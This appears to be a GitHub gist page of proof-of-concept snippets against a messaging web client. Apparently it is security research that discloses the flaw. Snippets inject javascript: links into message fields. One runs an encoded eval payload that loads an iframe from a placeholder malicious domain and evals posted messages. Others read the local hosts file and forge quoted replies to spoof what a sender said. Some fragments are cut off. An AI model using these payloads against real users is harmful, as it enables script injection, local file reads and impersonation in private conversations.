galpx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(navigator.userAgent); | |
| (async function(){ | |
| // read "file:///C:/Windows/System32/drivers/etc/hosts" content | |
| const r = await fetch('file:///C:/Windows/System32/drivers/etc/hosts); | |
| const t = await r.text(); | |
| alert(t) | |
| }()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head></head> | |
| <body> | |
| <script> | |
| top.postMessage( | |
| JSON.stringify( | |
| "open('https://facebook.com'); | |
| alert('external payload');" | |
| ), | |
| "*"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head></head> | |
| <body> | |
| <script> | |
| top.postMessage( | |
| JSON.stringify( | |
| "open('https://facebook.com'); | |
| alert('external payload');" | |
| ), | |
| "*"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var payload = ` | |
| hard_expire_time.innerHTML += | |
| '<object data="https://MY_MALICIOUS_DOMAIN/MY_PAYLOAD_IFRAME.html" />'; | |
| onmessage=(e)=>{eval(JSON.parse(e.data))}; | |
| `; | |
| payload = `javascript:"https://facebook.com";eval(atob("${btoa(payload)}"))`; | |
| e.__x_body = e.__x_matchedText = payload; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| e.__x_body = e.__x_matchedText = 'javascript:"https://example.com";alert(document.domain)'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| e.__x_body = e.__x_matchedText = "javascript:alert(document.domain)"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| e.__x_body = e.__x_matchedText = | |
| "Join Facebook! https://facebook.com+login_oage&welcome_to_facebook=true×tamp=42837643@bit.ly/2SfZikR Become a friend of mine!"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| e.__x_body = e.__x_matchedText = "https://example.com"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| e.__x_quotedMsg.body = "I think you are the worst!"; // alter the text | |
| e.__x_quotedStanzaID = e.__x_quotedStanzaID + "_"; // change the id of the original message |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| e = { | |
| __x_body: "Why would you say that?!", | |
| __x_type: "chat", | |
| __x_quotedMsg: { | |
| body: "I think you are the best!", | |
| type: "chat", | |
| mentionedJidList: [], | |
| isForwarded: false, | |
| labels: [], | |
| }, |
NewerOlder